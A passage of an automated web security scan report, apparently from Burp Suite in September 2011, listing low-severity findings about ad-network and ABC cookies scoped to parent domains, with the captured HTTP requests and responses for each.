Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.33166992268525064&keyword=smh/news_other&rf=http%3A//news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1023677.799695.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:49 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 548
Date: Wed, 07 Sep 2011 14:14:49 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:49 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<script language="JavaScript" type="text\/javascript">document.write(\'<script language="JavaScript" src="http:\/\/optimized-by.rubiconproject.com\/a\/dk.js?defaulting_ad=i3333333136
...[SNIP]...

8.51. http://r1-ads.ace.advertising.com/site=799696/size=728090/u=2/bnum=35855233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.watoday.com.au%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=799696/size=728090/u=2/bnum=35855233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.watoday.com.au%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=799696/size=728090/u=2/bnum=35855233/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.watoday.com.au%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.5778487676288933&keyword=wa/news_home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1023906.799696.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:35 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 679
Date: Wed, 07 Sep 2011 14:14:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:35 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- Site: Fairfax Digital Partner: Advertising.com Size: 728x90 -->\r\n<script language="javascript" type="text\/javascript">\r\n var dkcb = Math.random();\r\n document.write(
...[SNIP]...

8.52. http://r1-ads.ace.advertising.com/site=799696/size=728090/u=2/bnum=85535532/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fnews.smh.com.au%252Fbreaking-news-national%252Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=799696/size=728090/u=2/bnum=85535532/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fnews.smh.com.au%252Fbreaking-news-national%252Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=799696/size=728090/u=2/bnum=85535532/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fnews.smh.com.au%252Fbreaking-news-national%252Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.html?cb=0.8213596055284142&keyword=smh/news_other
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1023906.799696.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:15:31 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 679
Date: Wed, 07 Sep 2011 14:15:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:15:31 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.writeln('<!-- Site: Fairfax Digital Partner: Advertising.com Size: 728x90 -->\r\n<script language="javascript" type="text\/javascript">\r\n var dkcb = Math.random();\r\n document.write(
...[SNIP]...

8.53. http://r1-ads.ace.advertising.com/site=801645/size=728090/u=2/bnum=18256183/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=801645/size=728090/u=2/bnum=18256183/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=801645/size=728090/u=2/bnum=18256183/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1069538.801645.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:10 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:09 GMT
Content-Length: 995
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:10 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://view.atdmt.com/BVK/iview/349019757/direct/01/7542530158?click=http://r1-ads.ace.advertising.com/click/site=0000801645/mnum=0001069538/cstr=18256183=_4e677c31,754253
...[SNIP]...

8.54. http://r1-ads.ace.advertising.com/site=801647/size=300250/u=2/bnum=35058392/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=801647/size=300250/u=2/bnum=35058392/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=801647/size=300250/u=2/bnum=35058392/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.perthnow.com.au%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.905406.801647.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:13 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 898
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:13 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script type="text/javascript">document.write(\'<ifr\'+\'ame width="300" height="250" src="http://web.adblade.com/imps.php?app=3695&ad_width=300&ad_height=250&title_font=1&title_color=
...[SNIP]...

8.55. http://rc.d.chango.com/m/rc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rc.d.chango.com
Path:   /m/rc

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m/rc HTTP/1.1
Host: rc.d.chango.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: Chango RTB Server
Location: http://pixel.rubiconproject.com/tap.php?expires=30&nid=2245&put=b6ae888c-d95b-11e0-b096-0025900e0834&v=7727
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834; Domain=chango.com; expires=Sat, 04 Sep 2021 14:14:35 GMT; Path=/
Set-Cookie: _i_rc=1; Domain=chango.com; expires=Wed, 14 Sep 2011 14:14:35 GMT; Path=/
Connection: close


8.56. http://rp.gwallet.com/r1/ruum  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rp.gwallet.com
Path:   /r1/ruum

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/ruum HTTP/1.1
Host: rp.gwallet.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://pixel.rubiconproject.com/tap.php?v=7935&nid=2271&expires=30&put=DUSYkUQpjy1LEYeYEnMS6srZRiE
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Thu, 06-Sep-2012 14:14:19 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=j5; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=19; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1


8.57. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/feeds/invite-media-rtb/tokens/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/invite-media-rtb/tokens/?rt=iframe HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 07 Sep 2011 14:14:43 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://pixel.invitemedia.com/rubicon_sync?publisher_user_id=f772ba986ce1d14ae944dfcb2540fa9b434bfac6&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
Content-Length: 0
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 06-Sep-2012 14:14:43 GMT; Path=/
Set-Cookie: dq=3|3|0|0; Expires=Thu, 06-Sep-2012 14:14:43 GMT; Path=/
Set-Cookie: put_2101=""; Domain=.rubiconproject.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lm="7 Sep 2011 14:14:43 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close
Content-Type: text/plain; charset=UTF-8


8.58. http://tap.rubiconproject.com/oz/feeds/targus/profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/feeds/targus/profile

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/targus/profile?p=targus&oz_source=partner&segment=000&zip=&dob=&gender=&pc= HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; dq=2|2|0|0; lm="7 Sep 2011 14:14:36 GMT"; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; rdk15=1; ses15=12338^3&12590^3; csi15=3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^2

Response

HTTP/1.1 204 No Content
Date: Wed, 07 Sep 2011 14:15:54 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Thu, 06-Sep-2012 14:15:54 GMT; Path=/
Set-Cookie: dq=98|98|0|0; Expires=Thu, 06-Sep-2012 14:15:54 GMT; Path=/
Set-Cookie: lm="7 Sep 2011 14:15:54 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


8.59. http://user.lucidmedia.com/clicksense/user  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://user.lucidmedia.com
Path:   /clicksense/user

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clicksense/user?p=9ce688505699aefa&r=1 HTTP/1.1
Host: user.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2=38yalGDMfLj

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:19 GMT
Expires: Wed, 07 Sep 2011 14:14:19 GMT
P3P: CP="NOI ADM DEV CUR"
X-Handled-By: awswrh09/127.0.0.1
Set-Cookie: 2=38yalGDMfLj; Domain=.lucidmedia.com; Expires=Thu, 06-Sep-2012 14:14:19 GMT; Path=/
Location: http://pixel.rubiconproject.com/tap.php?v=4214&nid=1197&put=3620501663059719663&expires=30
Content-Length: 0
Connection: close


8.60. http://www.abc.net.au/includes/scripts/global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /includes/scripts/global.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /includes/scripts/global.js HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 10 Aug 2011 05:58:03 GMT
ETag: "11d7ab-4df7-5d0310c0"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=54212
Expires: Thu, 08 Sep 2011 05:17:45 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Content-Length: 19959
Connection: close
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853301; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au


// Assigns webtrends groups to pages by hostname or top level directory.
// Geoff Pack, June 2008
// last modified May 2011

var abcHost = location.host;
if (location.host.indexOf('www.') == 0) abcHo
...[SNIP]...

8.61. http://www.abc.net.au/local/global_css/common_modules/house_ads_m12.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/common_modules/house_ads_m12.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/house_ads_m12.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 20 May 2011 01:57:21 GMT
ETag: "3c7da1-1b97-7136e240"
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 7063
Cache-Control: max-age=9814
Expires: Wed, 07 Sep 2011 16:57:47 GMT
Date: Wed, 07 Sep 2011 14:14:13 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ABCGuestID=80.67.74.139.103791315404853207; expires=Wed, 07-Sep-2011 14:44:13 GMT; path=/; domain=abc.net.au

.house_ads .image {
   margin: 0 10px 0 0;
}

.house_ads .image .caption {
   display: none;
}    

.house_ads .text {
   margin: 0 0 10px 0;
}

.house_ads .text .heading {
   margin: 3px 0 10px 0;
...[SNIP]...

8.62. http://www.abc.net.au/local/global_css/common_modules/latest_media_m21.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc.net.au
Path:   /local/global_css/common_modules/latest_media_m21.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/global_css/common_modules/latest_media_m21.css HTTP/1.1
Host: www.abc.net.au
Proxy-Connection: keep-alive
Referer: http://www.abc.net.au/perth/news/
